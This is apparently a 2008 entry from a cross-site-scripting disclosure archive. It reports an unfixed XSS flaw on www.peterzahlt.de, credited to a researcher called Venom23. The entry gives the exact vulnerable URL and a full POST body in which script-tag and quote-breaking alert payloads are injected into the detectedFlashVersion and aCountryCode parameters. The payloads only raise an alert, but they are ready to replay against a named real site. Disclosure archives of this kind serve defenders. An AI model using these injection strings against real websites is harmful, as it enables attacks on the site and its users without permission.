Security researcher Venom23, has submitted on 19/06/2008 a cross-site-scripting (XSS) vulnerability affecting www.peterzahlt.de, which at the time of submission ranked 8580 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 23/06/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
| Date submitted: 19/06/2008 |
Date published: 23/06/2008 |
Fixed? Mail us! | Status:  UNFIXED |
| Author: Venom23 |
Domain: www.peterzahlt.de |
Category: XSS |
Pagerank: 8580 |
|---|
| URL: http://www.peterzahlt.de/c2c-peterzahlt/callRequest!handleDefault.do |
| POST: cvwQuery=&language=de&detectedBandwidth=&detectedBandwidthPort=&detectedBandwidthProtocol=&detectedF lashVersion="/><script>alert(String.fromCharCode(88,83,83))</script><meta&prevDetectedBandwidth=&pag eID=&pageCreationTime=&winWidth=1400&winHeight=882&modalXPosition=208&modalYPosition=&username=&pass word=&permanent=true&username2=&password2=&permanent2=true&allowScriptAccess=always&movie=swf/bw_det ection.swf?843&quality=high&wmode=transparent&bw_detection=undefined&aCountryCode=+';alert(String.fr omCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//&aNumber=888383888383888383888383888 383&bCountryCode=+8883&bNumber=888383888383888383888383888383&btnCall=ok&aGender=m&aGender=f&aAge=88 8383888383888383888383888383&btnCall=undefined |
|
Click here to view the mirror
|
|
|
| 
